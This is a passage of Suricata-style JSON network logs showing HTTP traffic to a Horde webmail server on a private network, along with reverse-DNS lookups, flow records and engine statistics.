,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2208
,"failed_udp":108},"tx":{"http":4500,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2285}},"flow_mgr":{"closed_pruned":2668,"new_pruned":15,"est_pruned":2252,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21160,"memcap_state":0,"memcap_global":0},"http":{"memuse":108597,"memcap":0}}} {"timestamp":"2020-02-29T00:04:05.216190+0000","flow_id":290368418484945,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52680,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:04:06.676109+0000","flow_id":1073078963949837,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49816,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32616,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:06.787475+0000","flow_id":1073078963949837,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49816,"proto":"UDP","dns":{"type":"answer","id":32616,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:04:06.787475+0000","flow_id":1073078963949837,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":49816,"proto":"UDP","dns":{"type":"answer","id":32616,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:06.871373+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3286}} {"timestamp":"2020-02-29T00:04:09.268672+0000","flow_id":1197830584211840,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":49249,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:09.374158+0000","flow_id":1197830584211840,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45696,"proto":"UDP","dns":{"type":"answer","id":49249,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:09.374158+0000","flow_id":1197830584211840,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45696,"proto":"UDP","dns":{"type":"answer","id":49249,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:04:09.585969+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6128}} {"timestamp":"2020-02-29T00:04:10.571181+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3286},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":16441,"tx_id":0}} {"timestamp":"2020-02-29T00:04:10.577609+0000","flow_id":1684033767133257,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53940,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42246,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:10.689883+0000","flow_id":1684033767133257,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53940,"proto":"UDP","dns":{"type":"answer","id":42246,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:04:10.689883+0000","flow_id":1684033767133257,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53940,"proto":"UDP","dns":{"type":"answer","id":42246,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:10.775587+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4207}} {"timestamp":"2020-02-29T00:04:12.000165+0000","event_type":"stats","stats":{"uptime":13904,"capture":{"kernel_packets":133091,"kernel_drops":0},"decoder":{"pkts":133102,"bytes":92224080,"invalid":180,"ipv4":131665,"ipv6":8,"ethernet":133102,"raw":0,"null":0,"sll":0,"tcp":126621,"udp":4850,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2691,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2707,"synack":2698,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"
reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1735,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2211,"failed_udp":108},"tx":{"http":4503,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2288}},"flow_mgr":{"closed_pruned":2668,"new_pruned":15,"est_pruned":2253,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22153,"memcap_state":0,"memcap_global":0},"http":{"memuse":104611,"memcap":0}}} {"timestamp":"2020-02-29T00:04:13.000689+0000","flow_id":1392564397028430,"event_type":"flow","src_ip":"192.168.10.130","src_port":34716,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":14,"bytes_toserver":1764,"bytes_toclient":10505,"start":"2020-02-29T00:03:02.078926+0000","end":"2020-02-29T00:03:12.487416+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:13.085632+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6128},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30698,"tx_id":0}} 
{"timestamp":"2020-02-29T00:04:13.095623+0000","flow_id":1835650407822727,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34876,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32846,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:13.201001+0000","flow_id":1835650407822727,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34876,"proto":"UDP","dns":{"type":"answer","id":32846,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:13.201001+0000","flow_id":1835650407822727,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34876,"proto":"UDP","dns":{"type":"answer","id":32846,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:13.260012+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3983}} {"timestamp":"2020-02-29T00:04:13.850697+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde&group=identities","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4207},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18539,"tx_id":1}} {"timestamp":"2020-02-29T00:04:13.858938+0000","flow_id":1842054204037946,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56174,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43521,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:13.964382+0000","flow_id":1842054204037946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56174,"proto":"UDP","dns":{"type":"answer","id":43521,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:13.964382+0000","flow_id":1842054204037946,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56174,"proto":"UDP","dns":{"type":"answer","id":43521,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:14.000532+0000","flow_id":518199234830083,"event_type":"flow","src_ip":"192.168.10.122","src_port":55695,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:12.958211+0000","end":"2020-02-28T23:59:13.067202+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:04:14.059453+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":227,"tx_id":2}} {"timestamp":"2020-02-29T00:04:14.071587+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4240}} {"timestamp":"2020-02-29T00:04:15.000366+0000","flow_id":1169518155910251,"event_type":"flow","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1821,"bytes_toclient":2206,"start":"2020-02-29T00:03:09.248939+0000","end":"2020-02-29T00:03:14.259385+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:04:15.000612+0000","flow_id":1452797018606239,"event_type":"flow","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":32,"pkts_toclient":35,"bytes_toserver":8103,"bytes_toclient":30851,"start":"2020-02-29T00:03:05.494239+0000","end":"2020-02-29T00:03:14.340795+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:17.804624+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3983},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19145,"tx_id":1}} {"timestamp":"2020-02-29T00:04:17.809849+0000","flow_id":1214726986095481,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48057,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62573,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:17.921212+0000","flow_id":1214726986095481,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48057,"proto":"UDP","dns":{"type":"answer","id":62573,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:04:17.921212+0000","flow_id":1214726986095481,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48057,"proto":"UDP","dns":{"type":"answer","id":62573,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:17.989839+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5156}} {"timestamp":"2020-02-29T00:04:19.000229+0000","event_type":"stats","stats":{"uptime":13911,"capture":{"kernel_packets":133116,"kernel_drops":0},"decoder":{"pkts":133128,"bytes":92236380,"invalid":180,"ipv4":131691,"ipv6":8,"ethernet":133128,"raw":0,"null":0,"sll":0,"tcp":126643,"udp":4854,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2691,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2707,"synack":2698,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1
735,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2213,"failed_udp":108},"tx":{"http":4505,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2290}},"flow_mgr":{"closed_pruned":2671,"new_pruned":15,"est_pruned":2254,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22815,"memcap_state":0,"memcap_global":0},"http":{"memuse":108612,"memcap":0}}} {"timestamp":"2020-02-29T00:04:19.076294+0000","flow_id":568154018685187,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4240},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18583,"tx_id":2}} {"timestamp":"2020-02-29T00:04:20.000426+0000","flow_id":1742161835436144,"event_type":"flow","src_ip":"192.168.10.122","src_port":57837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:19.108656+0000","end":"2020-02-28T23:59:19.216503+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:04:20.000623+0000","flow_id":1755910025764076,"event_type":"flow","src_ip":"192.168.10.122","src_port":44575,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:19.318700+0000","end":"2020-02-28T23:59:19.430067+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:21.000491+0000","flow_id":2181365191206253,"event_type":"flow","src_ip":"192.168.10.122","src_port":54269,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:20.386413+0000","end":"2020-02-28T23:59:20.494438+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:22.216488+0000","flow_id":1027835779501480,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40419,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58517,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:22.321659+0000","flow_id":1027835779501480,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40419,"proto":"UDP","dns":{"type":"answer","id":58517,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:22.321659+0000","flow_id":1027835779501480,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40419,"proto":"UDP","dns":{"type":"answer","id":58517,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:04:22.410696+0000","flow_id":738608386810466,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34730,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3287}} {"timestamp":"2020-02-29T00:04:22.953806+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34728,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/browse.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5156},"app_proto":"http","fileinfo":{"filename":"\/turba\/browse.php","state":"CLOSED","stored":false,"size":28190,"tx_id":2}} {"timestamp":"2020-02-29T00:04:22.963363+0000","flow_id":871752373023523,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50439,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28444,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:23.068671+0000","flow_id":871752373023523,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50439,"proto":"UDP","dns":{"type":"answer","id":28444,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:04:23.068671+0000","flow_id":871752373023523,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50439,"proto":"UDP","dns":{"type":"answer","id":28444,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:23.150300+0000","flow_id":1313463988770583,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/turba\/contact.php?source=P7pxaJ1DBxG_43W0bvFVAZB&key=o241TITlIk1VAA6qdFVfKPG","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/browse.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":20687}} {"timestamp":"2020-02-29T00:04:23.537409+0000","flow_id":1696278719705921,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56324,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":609,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:23.642729+0000","flow_id":1696278719705921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56324,"proto":"UDP","dns":{"type":"answer","id":609,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:23.642729+0000","flow_id":1696278719705921,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56324,"proto":"UDP","dns":{"type":"answer","id":609,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:04:23.725396+0000","flow_id":1497310064742804,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56584,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":26993,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:23.830890+0000","flow_id":1497310064742804,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56584,"proto":"UDP","dns":{"type":"answer","id":26993,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 